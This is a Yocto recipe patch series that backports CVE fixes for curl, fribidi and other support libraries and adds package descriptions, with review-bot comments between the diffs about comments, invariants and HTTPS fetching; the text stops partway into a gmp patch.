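Review bot: The comment added in tests/data/test728 says `curl must return error CURLE_PROXY in this case`, but this backport returns `CURLE_COULDNT_RESOLVE_HOST` from Curl_SOCKS5 and the test expects `<errorcode>` 6, as the patch description itself explains. The comment should match the code: `# SOCKS5 remote resolve. curl must return CURLE_COULDNT_RESOLVE_HOST (6) in this case.` In the first lib/socks.c hunk the new `failf(data, ...)` uses `data` while the neighbouring `infof` uses `conn->data`. `data` is used further down in the same function, so it is presumably in scope here, but its declaration is outside the hunk and worth confirming against the patched tree.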
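diff --git a/meta/recipes-support/curl/curl/CVE-2023-38546.patch b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
new file mode 100644
index 0000000000..30ef2fd038
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-38546.patch
@@ -0,0 +1,132 @@
+From 7b67721f12cbe6ed1a41e7332f3b5a7186a5e23f Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 14 Sep 2023 23:28:32 +0200
+Subject: [PATCH] cookie: remove unnecessary struct fields
+To: libcurl development <curl-library@cool.haxx.se>
+
+Plus: reduce the hash table size from 256 to 63. It seems unlikely to
+make much of a speed difference for most use cases but saves 1.5KB of
+data per instance.
+
+Closes #11862
+
+This patch taken from Debian's 7.64.0-4+deb10u7 package which applied with
+only a little fuzz.
+
+CVE: CVE-2023-38546
+Upstream-Status: Backport [61275672b46d9abb32857404]
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/cookie.c | 13 +------------
+ lib/cookie.h | 7 ++-----
+ lib/easy.c | 4 +---
+ 3 files changed, 4 insertions(+), 20 deletions(-)
+
+diff --git a/lib/cookie.c b/lib/cookie.c
+index 68054e1c4..a378f28e1 100644
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -114,7 +114,6 @@ static void freecookie(struct Cookie *co)
+ free(co->name);
+ free(co->value);
+ free(co->maxage);
+- free(co->version);
+ free(co);
+ }
+
+@@ -641,11 +640,7 @@ Curl_cookie_add(struct Curl_easy *data,
+ }
+ }
+ else if(strcasecompare("version", name)) {
+- strstore(&co->version, whatptr);
+- if(!co->version) {
+- badcookie = TRUE;
+- break;
+- }
++ /* just ignore */
+ }
+ else if(strcasecompare("max-age", name)) {
+ /* Defined in RFC2109:
+@@ -1042,7 +1037,6 @@ Curl_cookie_add(struct Curl_easy *data,
+ free(clist->path);
+ free(clist->spath);
+ free(clist->expirestr);
+- free(clist->version);
+ free(clist->maxage);
+
+ *clist = *co; /* then store all the new data */
+@@ -1111,9 +1105,6 @@ struct CookieInfo *Curl_cookie_init(struct Curl_easy *data,
+ c = calloc(1, sizeof(struct CookieInfo));
+ if(!c)
+ return NULL; /* failed to get memory */
+- c->filename = strdup(file?file:"none"); /* copy the name just in case */
+- if(!c->filename)
+- goto fail; /* failed to get memory */
+ }
+ else {
+ /* we got an already existing one, use that */
+@@ -1241,7 +1232,6 @@ static struct Cookie *dup_cookie(struct Cookie *src)
+ CLONE(name);
+ CLONE(value);
+ CLONE(maxage);
+- CLONE(version);
+ d->expires = src->expires;
+ d->tailmatch = src->tailmatch;
+ d->secure = src->secure;
+@@ -1457,7 +1447,6 @@ void Curl_cookie_cleanup(struct CookieInfo *c)
+ {
+ if(c) {
+ unsigned int i;
+- free(c->filename);
+ for(i = 0; i < COOKIE_HASH_SIZE; i++)
+ Curl_cookie_freelist(c->cookies[i]);
+ free(c); /* free the base struct as well */
+diff --git a/lib/cookie.h b/lib/cookie.h
+index b3865e601..2e667cda0 100644
+--- a/lib/cookie.h
++++ b/lib/cookie.h
+@@ -36,8 +36,6 @@ struct Cookie {
+ char *expirestr; /* the plain text version */
+ bool tailmatch; /* whether we do tail-matching of the domain name */
+
+- /* RFC 2109 keywords. Version=1 means 2109-compliant cookie sending */
+- char *version; /* Version = <value> */
+ char *maxage; /* Max-Age = <value> */
+
+ bool secure; /* whether the 'secure' keyword was used */
+@@ -54,15 +52,14 @@ struct Cookie {
+ #define COOKIE_PREFIX__SECURE (1<<0)
+ #define COOKIE_PREFIX__HOST (1<<1)
+
+-#define COOKIE_HASH_SIZE 256
++#define COOKIE_HASH_SIZE 63
+
+ struct CookieInfo {
+ /* linked list of cookies we know of */
+ struct Cookie *cookies[COOKIE_HASH_SIZE];
+
+- char *filename; /* file we read from/write to */
+ bool running; /* state info, for cookie adding information */
+- long numcookies; /* number of cookies in the "jar" */
++ int numcookies; /* number of cookies in the "jar" */
+ bool newsession; /* new session, discard session cookies on load */
+ int lastct; /* last creation-time used in the jar */
+ };
+diff --git a/lib/easy.c b/lib/easy.c
+index b648e80c1..cdca0fb03 100644
+--- a/lib/easy.c
++++ b/lib/easy.c
+@@ -840,9 +840,7 @@ struct Curl_easy *curl_easy_duphandle(struct Curl_easy *data)
+ if(data->cookies) {
+ /* If cookies are enabled in the parent handle, we enable them
+ in the clone as well! */
+- outcurl->cookies = Curl_cookie_init(data,
+- data->cookies->filename,
+- outcurl->cookies,
++ outcurl->cookies = Curl_cookie_init(data, NULL, outcurl->cookies,
+ data->set.cookiesession);
+ if(!outcurl->cookies)
+ goto fail;
+--
+2.39.2
+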
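Review bot: The patch header never explains why a change titled "remove unnecessary struct fields" is the fix for CVE-2023-38546, and `Upstream-Status: Backport [61275672b46d9abb32857404]` cites a truncated hash with no URL. Judging from the hunks, the security-relevant part appears to be the `lib/easy.c` change: `curl_easy_duphandle` no longer feeds `data->cookies->filename` (which `Curl_cookie_init` used to fill with the placeholder `"none"`) back into `Curl_cookie_init`, so the clone presumably stops treating that placeholder as a cookie file name. I would add one sentence saying so to the description and give the full upstream commit reference. The `COOKIE_HASH_SIZE` 256 to 63 and `long` to `int numcookies` changes are not needed for the fix; since the patch applied "with only a little fuzz", every use of both in the 7.69.1 tree outside these hunks (hash computation, format strings) should be checked before relying on it.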
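diff --git a/meta/recipes-support/curl/curl/CVE-2023-46218.patch b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
new file mode 100644
index 0000000000..c9677b6a84
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-46218.patch
@@ -0,0 +1,52 @@
+CVE: CVE-2023-46218
+Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/c/curl/curl_7.68.0-1ubuntu2.21.debian.tar.xz upstream https://github.com/curl/curl/commit/2b0994c29a721c91c57 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 2b0994c29a721c91c572cff7808c572a24d251eb Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 23 Nov 2023 08:15:47 +0100
+Subject: [PATCH] cookie: lowercase the domain names before PSL checks
+
+Reported-by: Harry Sintonen
+
+Closes #12387
+---
+ lib/cookie.c | 24 ++++++++++++++++--------
+ 1 file changed, 16 insertions(+), 8 deletions(-)
+
+--- a/lib/cookie.c
++++ b/lib/cookie.c
+@@ -967,15 +967,23 @@ Curl_cookie_add(struct Curl_easy *data,
+ #ifdef USE_LIBPSL
+ /* Check if the domain is a Public Suffix and if yes, ignore the cookie. */
+ if(domain && co->domain && !isip(co->domain)) {
+- const psl_ctx_t *psl = Curl_psl_use(data);
+- int acceptable;
+-
+- if(psl) {
+- acceptable = psl_is_cookie_domain_acceptable(psl, domain, co->domain);
+- Curl_psl_release(data);
++ bool acceptable = FALSE;
++ char lcase[256];
++ char lcookie[256];
++ size_t dlen = strlen(domain);
++ size_t clen = strlen(co->domain);
++ if((dlen < sizeof(lcase)) && (clen < sizeof(lcookie))) {
++ const psl_ctx_t *psl = Curl_psl_use(data);
++ if(psl) {
++ /* the PSL check requires lowercase domain name and pattern */
++ Curl_strntolower(lcase, domain, dlen + 1);
++ Curl_strntolower(lcookie, co->domain, clen + 1);
++ acceptable = psl_is_cookie_domain_acceptable(psl, lcase, lcookie);
++ Curl_psl_release(data);
++ }
++ else
++ acceptable = !bad_domain(domain);
+ }
+- else
+- acceptable = !bad_domain(domain);
+
+ if(!acceptable) {
+ infof(data, "cookie '%s' dropped, domain '%s' must not "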
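Review bot: In the `USE_LIBPSL` block of `Curl_cookie_add`, a domain of 256 bytes or more now leaves `acceptable` at `FALSE`, so the cookie is dropped without the PSL or `bad_domain()` check ever running; that is the safe direction, but nothing in the code says it is intended. A comment on the length test such as `/* over-long names fail closed: acceptable stays FALSE */` would keep a later refactor from turning this into a fail-open path. The `dlen + 1` and `clen + 1` arguments rely on `Curl_strntolower` copying the terminating NUL as well, which deserves a word in the existing comment. `Curl_cookie_add` starts and ends outside the hunk, and the backport assumes `Curl_strntolower` is available in 7.69.1, which cannot be confirmed from this page.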
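diff --git a/meta/recipes-support/curl/curl/CVE-2024-2398.patch b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
new file mode 100644
index 0000000000..a3840336f0
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2024-2398.patch
@@ -0,0 +1,88 @@
+Backport of:
+
+From deca8039991886a559b67bcd6701db800a5cf764 Mon Sep 17 00:00:00 2001
+From: Stefan Eissing <stefan@eissing.org>
+Date: Wed, 6 Mar 2024 09:36:08 +0100
+Subject: [PATCH] http2: push headers better cleanup
+
+- provide common cleanup method for push headers
+
+Closes #13054
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2024-2398.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/deca8039991886a559b67bcd6701db800a5cf764]
+CVE: CVE-2024-2398
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/http2.c | 34 +++++++++++++++-------------------
+ 1 file changed, 15 insertions(+), 19 deletions(-)
+
+--- a/lib/http2.c
++++ b/lib/http2.c
+@@ -515,6 +515,15 @@ static struct Curl_easy *duphandle(struc
+ }
+
+
++static void free_push_headers(struct HTTP *stream)
++{
++ size_t i;
++ for(i = 0; i<stream->push_headers_used; i++)
++ free(stream->push_headers[i]);
++ Curl_safefree(stream->push_headers);
++ stream->push_headers_used = 0;
++}
++
+ static int push_promise(struct Curl_easy *data,
+ struct connectdata *conn,
+ const nghttp2_push_promise *frame)
+@@ -528,7 +537,6 @@ static int push_promise(struct Curl_easy
+ struct curl_pushheaders heads;
+ CURLMcode rc;
+ struct http_conn *httpc;
+- size_t i;
+ /* clone the parent */
+ struct Curl_easy *newhandle = duphandle(data);
+ if(!newhandle) {
+@@ -557,11 +565,7 @@ static int push_promise(struct Curl_easy
+ Curl_set_in_callback(data, false);
+
+ /* free the headers again */
+- for(i = 0; i<stream->push_headers_used; i++)
+- free(stream->push_headers[i]);
+- free(stream->push_headers);
+- stream->push_headers = NULL;
+- stream->push_headers_used = 0;
++ free_push_headers(stream);
+
+ if(rv) {
+ /* denied, kill off the new handle again */
+@@ -995,10 +999,10 @@ static int on_header(nghttp2_session *se
+ stream->push_headers_alloc) {
+ char **headp;
+ stream->push_headers_alloc *= 2;
+- headp = Curl_saferealloc(stream->push_headers,
+- stream->push_headers_alloc * sizeof(char *));
++ headp = realloc(stream->push_headers,
++ stream->push_headers_alloc * sizeof(char *));
+ if(!headp) {
+- stream->push_headers = NULL;
++ free_push_headers(stream);
+ return NGHTTP2_ERR_TEMPORAL_CALLBACK_FAILURE;
+ }
+ stream->push_headers = headp;
+@@ -1179,14 +1183,7 @@ void Curl_http2_done(struct Curl_easy *d
+ if(http->header_recvbuf) {
+ Curl_add_buffer_free(&http->header_recvbuf);
+ Curl_add_buffer_free(&http->trailer_recvbuf);
+- if(http->push_headers) {
+- /* if they weren't used and then freed before */
+- for(; http->push_headers_used > 0; --http->push_headers_used) {
+- free(http->push_headers[http->push_headers_used - 1]);
+- }
+- free(http->push_headers);
+- http->push_headers = NULL;
+- }
++ free_push_headers(http);
+ }
+
+ if(!httpc->h2) /* not HTTP/2 ? */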
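Review bot: `free_push_headers()` dereferences `stream->push_headers[i]` for every `i < push_headers_used` without looking at the array pointer, and the `Curl_http2_done` hunk removes the `if(http->push_headers)` guard that used to sit in front of the same loop. That is safe only while `push_headers_used` is 0 whenever `push_headers` is NULL; the helper keeps that true on its own exit, but where the two fields are first initialised is outside the hunks. I would state the invariant above the helper, for example `/* relies on push_headers_used == 0 whenever push_headers is NULL */`, so the next backport onto this file does not break it silently. Separately, the `Upstream-Status` bracket is split across two lines, which tooling that parses the tag line by line may not read as one entry.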
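diff --git a/meta/recipes-support/curl/curl_7.69.1.bb b/meta/recipes-support/curl/curl_7.69.1.bb
index c3d629108a..2f351d585a 100644
--- a/meta/recipes-support/curl/curl_7.69.1.bb
+++ b/meta/recipes-support/curl/curl_7.69.1.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Command line tool and library for client-side URL transfers"
+DESCRIPTION = "It uses URL syntax to transfer data to and from servers. \
+curl is a widely used because of its ability to be flexible and complete \
+complex tasks. For example, you can use curl for things like user authentication, \
+HTTP post, SSL connections, proxy support, FTP uploads, and more!"
 HOMEPAGE = "http://curl.haxx.se/"
 BUGTRACKER = "http://curl.haxx.se/mail/list.cgi?list=curl-tracker"
 SECTION = "console/network"
@@ -13,6 +17,48 @@ SRC_URI = "https://curl.haxx.se/download/curl-${PV}.tar.bz2 \
  file://CVE-2020-8284.patch \
  file://CVE-2020-8285.patch \
  file://CVE-2020-8286.patch \
+ file://CVE-2021-22876.patch \
+ file://CVE-2021-22890.patch \
+ file://CVE-2021-22898.patch \
+ file://CVE-2021-22924.patch \
+ file://CVE-2021-22925.patch \
+ file://CVE-2021-22946-pre1.patch \
+ file://CVE-2021-22946.patch \
+ file://CVE-2021-22947.patch \
+ file://CVE-2022-27776.patch \
+ file://CVE-2022-27775.patch \
+ file://CVE-2022-22576.patch \
+ file://CVE-2022-27774-1.patch \
+ file://CVE-2022-27774-2.patch \
+ file://CVE-2022-27774-3.patch \
+ file://CVE-2022-27774-4.patch \
+ file://CVE-2022-27781.patch \
+ file://CVE-2022-27782-1.patch \
+ file://CVE-2022-27782-2.patch \
+ file://CVE-2022-32206.patch \
+ file://CVE-2022-32207.patch \
+ file://CVE-2022-32208.patch \
+ file://CVE-2022-35252.patch \
+ file://CVE-2022-32221.patch \
+ file://CVE-2022-35260.patch \
+ file://CVE-2022-43552.patch \
+ file://CVE-2023-23916.patch \
+ file://CVE-2023-27534-pre1.patch \
+ file://CVE-2023-27534.patch \
+ file://CVE-2023-27538.patch \
+ file://CVE-2023-27533.patch \
+ file://CVE-2023-27535-pre1.patch \
+ file://CVE-2023-27535.patch \
+ file://CVE-2023-27536.patch \
+ file://CVE-2023-28320.patch \
+ file://CVE-2023-28320-fol1.patch \
+ file://CVE-2023-32001.patch \
+ file://CVE-2023-38545.patch \
+ file://CVE-2023-38546.patch \
+ file://CVE-2023-28321.patch \
+ file://CVE-2023-28322.patch \
+ file://CVE-2023-46218.patch \
+ file://CVE-2024-2398.patch \
 "
 
 SRC_URI[md5sum] = "ec5fc263f898a3dfef08e805f1ecca42"
@@ -20,6 +66,15 @@ SRC_URI[sha256sum] = "2ff5e5bd507adf6aa88ff4bbafd4c7af464867ffb688be93b9930717a5
 
 # Curl has used many names over the years...
 CVE_PRODUCT = "haxx:curl haxx:libcurl curl:curl curl:libcurl libcurl:libcurl daniel_stenberg:curl"
+CVE_CHECK_WHITELIST = "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-2021-22945"
+
+# As per link https://security-tracker.debian.org/tracker/CVE-2021-22897
+# and https://ubuntu.com/security/CVE-2021-22897
+# This CVE issue affects Windows only Hence whitelisting this CVE
+CVE_CHECK_WHITELIST += "CVE-2021-22897"
+
+# This CVE reports that apple had to upgrade curl because of other already reported CVEs
+CVE_CHECK_WHITELIST += "CVE-2023-42915"
 
 inherit autotools pkgconfig binconfig multilib_header
 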
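Review bot: The first `CVE_CHECK_WHITELIST` line uses `=` and gives no reason for the four CVEs it lists, unlike the two `+=` entries below it, which each carry a justification. A plain assignment replaces any value set earlier in parsing, and a whitelist entry with no stated reason cannot be re-audited when the recipe or its PACKAGECONFIG changes. I would write it as `CVE_CHECK_WHITELIST += "CVE-2021-22922 CVE-2021-22923 CVE-2021-22926 CVE-2021-22945"` with a comment above it saying, per ID, why it does not apply to this build.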
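diff --git a/meta/recipes-support/db/db_5.3.28.bb b/meta/recipes-support/db/db_5.3.28.bb
index 318efcb61d..b2ae98f05c 100644
--- a/meta/recipes-support/db/db_5.3.28.bb
+++ b/meta/recipes-support/db/db_5.3.28.bb
@@ -10,11 +10,12 @@
 # same system at the same time if really necessary.
 SECTION = "libs"
 SUMMARY = "Berkeley Database v5"
+DESCRIPTION = "Provides the foundational storage services for your application, no matter how demanding and unique your requirements may seem to be"
 HOMEPAGE = "https://www.oracle.com/database/technologies/related/berkeleydb.html"
 LICENSE = "Sleepycat"
 RCONFLICTS_${PN} = "db3"
 
-CVE_PRODUCT = "oracle_berkeley_db"
+CVE_PRODUCT = "oracle_berkeley_db berkeley_db"
 CVE_VERSION = "11.2.${PV}"
 
 PR = "r1"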
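diff --git a/meta/recipes-support/debianutils/debianutils_4.9.1.bb b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
index 904c52780f..8603fecbd0 100644
--- a/meta/recipes-support/debianutils/debianutils_4.9.1.bb
+++ b/meta/recipes-support/debianutils/debianutils_4.9.1.bb
@@ -1,4 +1,9 @@
 SUMMARY = "Miscellaneous utilities specific to Debian"
+DESCRIPTION = "Provides a number of small utilities which are used \
+primarily by the installation scripts of Debian packages, although \
+you may use them directly. "
+HOMEPAGE = "https://packages.debian.org/sid/debianutils"
+BUGTRACKER = "https://bugs.debian.org/cgi-bin/pkgreport.cgi?pkg=debianutils;dist=unstable"
 SECTION = "base"
 LICENSE = "GPLv2 & SMAIL_GPL"
 LIC_FILES_CHKSUM = "file://debian/copyright;md5=f01a5203d50512fc4830b4332b696a9f"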
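diff --git a/meta/recipes-support/diffoscope/diffoscope_136.bb b/meta/recipes-support/diffoscope/diffoscope_172.bb
index 3e3e1dfc00..b26713c47f 100644
--- a/meta/recipes-support/diffoscope/diffoscope_136.bb
+++ b/meta/recipes-support/diffoscope/diffoscope_172.bb
@@ -7,12 +7,19 @@ PYPI_PACKAGE = "diffoscope"
 
 inherit pypi setuptools3
 
-SRC_URI[md5sum] = "c84d8d308a40176ba2f5dc4abdbf6f73"
-SRC_URI[sha256sum] = "0d6486d6eb6e0445ba21fee2e8bdd3a366ce786bfac98e00e5a95038b7815f15"
+SRC_URI[sha256sum] = "5ffe7f38555c6409bc7e7edc277ed77dd78641fe1306fc38d153dbbe445ddea4"
 
 RDEPENDS_${PN} += "binutils vim squashfs-tools python3-libarchive-c python3-magic"
 
 # Dependencies don't build for musl
 COMPATIBLE_HOST_libc-musl = 'null'
 
+do_install_append_class-native() {
+ create_wrapper ${D}${bindir}/diffoscope \
+ MAGIC=${STAGING_DIR_NATIVE}${datadir_native}/misc/magic.mgc \
+ RPM_CONFIGDIR=${STAGING_LIBDIR_NATIVE}/rpm \
+ LD_LIBRARY_PATH=${STAGING_LIBDIR_NATIVE} \
+ RPM_ETCCONFIGDIR=${STAGING_DIR_NATIVE}
+}
+
 BBCLASSEXTEND = "native"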
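Review bot: The new `do_install_append_class-native` wrapper carries no comment saying why diffoscope needs these four variables, and `LD_LIBRARY_PATH=${STAGING_LIBDIR_NATIVE}` is set unconditionally rather than appended to an existing value. Because the wrapper's environment is presumably inherited by every helper diffoscope launches, host tools it calls would also resolve libraries from the native sysroot first, which is worth confirming is intended. I would add a comment above the function, for example `# native diffoscope must find libmagic's database and the rpm config in the native sysroot`, adjusted to whatever the actual reason is.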
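diff --git a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
index 1623285fd0..ea34e4c7a3 100644
--- a/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
+++ b/meta/recipes-support/dos2unix/dos2unix_7.4.1.bb
@@ -8,7 +8,7 @@ SECTION = "support"
 LICENSE = "BSD-2-Clause"
 LIC_FILES_CHKSUM = "file://COPYING.txt;md5=0c977b18f0a384d03597a517d7d03e32"
 
-SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix"
+SRC_URI = "git://git.code.sf.net/p/dos2unix/dos2unix;branch=master"
 UPSTREAM_CHECK_GITTAGREGEX = "dos2unix-(?P<pver>(\d+(\.\d+)+))"
 
 SRCREV = "0490f0723b1a0851b17343f6164915f3474b5197"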
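Review bot: The rewritten `SRC_URI` still fetches over a transport with no server authentication (the default for a bare `git://` URL), and the gnome-desktop-testing recipe further down is edited the same way while keeping `protocol=http`. The pinned `SRCREV` limits what a tampered transfer can substitute, but the fetch can still be observed or interfered with on the path, and the pin is the only integrity check left. Since both lines are being touched anyway, I would add `;protocol=https` here and change `protocol=http` to `protocol=https` in gnome-desktop-testing, assuming both hosts serve the repositories over HTTPS.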
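diff --git a/meta/recipes-support/enchant/enchant2_2.2.8.bb b/meta/recipes-support/enchant/enchant2_2.2.8.bb
index 4ddbe55da5..7c624efea3 100644
--- a/meta/recipes-support/enchant/enchant2_2.2.8.bb
+++ b/meta/recipes-support/enchant/enchant2_2.2.8.bb
@@ -1,6 +1,9 @@
 SUMMARY = "Enchant Spell checker API Library"
+DESCRIPTION = "A library (and command-line program) that wraps a number of \
+different spelling libraries and programs with a consistent interface."
 SECTION = "libs"
 HOMEPAGE = "https://abiword.github.io/enchant/"
+BUGTRACKER = "https://github.com/AbiWord/enchant/issues/"
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=a916467b91076e631dd8edb7424769c7"
 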
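diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
new file mode 100644
index 0000000000..8f2c2ade0e
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25308.patch
@@ -0,0 +1,50 @@
+From ad3a19e6372b1e667128ed1ea2f49919884587e1 Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 17:30:12 +0900
+Subject: [PATCH] Fix the stack buffer overflow issue
+
+strlen() could returns 0. Without a conditional check for len,
+accessing S_ pointer with len - 1 may causes a stack buffer overflow.
+
+AddressSanitizer reports this like:
+==1219243==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdce043c1f at pc 0x000000403547 bp 0x7ffdce0
+43b30 sp 0x7ffdce043b28
+READ of size 1 at 0x7ffdce043c1f thread T0
+ #0 0x403546 in main ../bin/fribidi-main.c:393
+ #1 0x7f226804e58f in __libc_start_call_main (/lib64/libc.so.6+0x2d58f)
+ #2 0x7f226804e648 in __libc_start_main_impl (/lib64/libc.so.6+0x2d648)
+ #3 0x4036f4 in _start (/tmp/fribidi/build/bin/fribidi+0x4036f4)
+
+Address 0x7ffdce043c1f is located in stack of thread T0 at offset 63 in frame
+ #0 0x4022bf in main ../bin/fribidi-main.c:193
+
+ This frame has 5 object(s):
+ [32, 36) 'option_index' (line 233)
+ [48, 52) 'base' (line 386)
+ [64, 65064) 'S_' (line 375) <== Memory access at offset 63 underflows this variable
+ [65328, 130328) 'outstring' (line 385)
+ [130592, 390592) 'logical' (line 384)
+
+This fixes https://github.com/fribidi/fribidi/issues/181
+
+CVE: CVE-2022-25308
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/ad3a19e6372b1e667128ed1ea2f49919884587e1]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ bin/fribidi-main.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/bin/fribidi-main.c b/bin/fribidi-main.c
+index 3cf9fe1..3ae4fb6 100644
+--- a/bin/fribidi-main.c
++++ b/bin/fribidi-main.c
+@@ -390,7 +390,7 @@ FRIBIDI_END_IGNORE_DEPRECATIONS
+ S_[sizeof (S_) - 1] = 0;
+ len = strlen (S_);
+ /* chop */
+- if (S_[len - 1] == '\n')
++ if (len > 0 && S_[len - 1] == '\n')
+ {
+ len--;
+ S_[len] = '\0';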
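diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
new file mode 100644
index 0000000000..0efba3d05c
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25309.patch
@@ -0,0 +1,31 @@
+From f22593b82b5d1668d1997dbccd10a9c31ffea3b3 Mon Sep 17 00:00:00 2001
+From: Dov Grobgeld <dov.grobgeld@gmail.com>
+Date: Fri, 25 Mar 2022 09:09:49 +0300
+Subject: [PATCH] Protected against garbage in the CapRTL encoder
+
+CVE: CVE-2022-25309
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/f22593b82b5d1668d1997dbccd10a9c31ffea3b3]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi-char-sets-cap-rtl.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/lib/fribidi-char-sets-cap-rtl.c b/lib/fribidi-char-sets-cap-rtl.c
+index b0c0e4a..f74e010 100644
+--- a/lib/fribidi-char-sets-cap-rtl.c
++++ b/lib/fribidi-char-sets-cap-rtl.c
+@@ -232,7 +232,12 @@ fribidi_cap_rtl_to_unicode (
+ }
+ }
+ else
+- us[j++] = caprtl_to_unicode[(int) s[i]];
++ {
++ if ((int)s[i] < 0)
++ us[j++] = '?';
++ else
++ us[j++] = caprtl_to_unicode[(int) s[i]];
++ }
+ }
+
+ return j;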
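Review bot: The added guard `if ((int)s[i] < 0)` catches bytes above 0x7f only where plain `char` is signed; on targets where `char` is unsigned (common for ARM and PowerPC builds) the same bytes arrive as 128 to 255 and still reach `caprtl_to_unicode[(int) s[i]]`. Whether that read is out of bounds depends on the size of the table, which is declared outside the hunk, so it needs checking against the full file. A sign-independent form would compare `(unsigned char) s[i]` with the table's element count and emit `'?'` for anything at or beyond it. That goes beyond the upstream commit being backported, so it belongs in a separate follow-up patch rather than an edit to this one.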
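diff --git a/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
new file mode 100644
index 0000000000..d79a82d648
--- /dev/null
+++ b/meta/recipes-support/fribidi/fribidi/CVE-2022-25310.patch
@@ -0,0 +1,30 @@
+From 175850b03e1af251d705c1d04b2b9b3c1c06e48f Mon Sep 17 00:00:00 2001
+From: Akira TAGOH <akira@tagoh.org>
+Date: Thu, 17 Feb 2022 19:06:10 +0900
+Subject: [PATCH] Fix SEGV issue in fribidi_remove_bidi_marks
+
+Escape from fribidi_remove_bidi_marks() immediately if str is null.
+
+This fixes https://github.com/fribidi/fribidi/issues/183
+
+CVE: CVE-2022-25310
+Upstream-Status: Backport [https://github.com/fribidi/fribidi/commit/175850b03e1af251d705c1d04b2b9b3c1c06e48f]
+Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
+
+---
+ lib/fribidi.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/fribidi.c b/lib/fribidi.c
+index f5da0da..70bdab2 100644
+--- a/lib/fribidi.c
++++ b/lib/fribidi.c
+@@ -74,7 +74,7 @@ fribidi_remove_bidi_marks (
+ fribidi_boolean status = false;
+
+ if UNLIKELY
+- (len == 0)
++ (len == 0 || str == NULL)
+ {
+ status = true;
+ goto out;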
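diff --git a/meta/recipes-support/fribidi/fribidi_1.0.9.bb b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
index 0654b07dc7..62b7d72812 100644
--- a/meta/recipes-support/fribidi/fribidi_1.0.9.bb
+++ b/meta/recipes-support/fribidi/fribidi_1.0.9.bb
@@ -1,9 +1,18 @@
 SUMMARY = "Free Implementation of the Unicode Bidirectional Algorithm"
+DESCRIPTION = "It provides utility functions to aid in the development \
+of interactive editors and widgets that implement BiDi functionality. \
+The BiDi algorithm is a prerequisite for supporting right-to-left scripts such \
+as Hebrew, Arabic, Syriac, and Thaana. "
 SECTION = "libs"
+HOMEPAGE = "http://fribidi.org/"
+BUGTRACKER = "https://github.com/fribidi/fribidi/issues"
 LICENSE = "LGPLv2.1+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=a916467b91076e631dd8edb7424769c7"
 
 SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/v${PV}/${BP}.tar.xz \
+ file://CVE-2022-25308.patch \
+ file://CVE-2022-25309.patch \
+ file://CVE-2022-25310.patch \
  "
 SRC_URI[md5sum] = "1b767c259c3cd8e0c8496970f63c22dc"
 SRC_URI[sha256sum] = "c5e47ea9026fb60da1944da9888b4e0a18854a0e2410bbfe7ad90a054d36e0c7"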
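diff --git a/meta/recipes-support/gdbm/gdbm_1.18.1.bb b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
index fbb1fe72d7..bfc9ee8f85 100644
--- a/meta/recipes-support/gdbm/gdbm_1.18.1.bb
+++ b/meta/recipes-support/gdbm/gdbm_1.18.1.bb
@@ -1,4 +1,7 @@
 SUMMARY = "Key/value database library with extensible hashing"
+DESCRIPTION = "Library of database functions that use extensible hashing \
+and work similar to the standard UNIX dbm. These routines are provided \
+to a programmer needing to create and manipulate a hashed database."
 HOMEPAGE = "http://www.gnu.org/software/gdbm/"
 SECTION = "libs"
 LICENSE = "GPLv3"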
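diff --git a/meta/recipes-support/gmp/gmp/cve-2021-43618.patch b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
new file mode 100644
index 0000000000..095fb21eaa
--- /dev/null
+++ b/meta/recipes-support/gmp/gmp/cve-2021-43618.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2021-43618
+Upstream-Status: Backport
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
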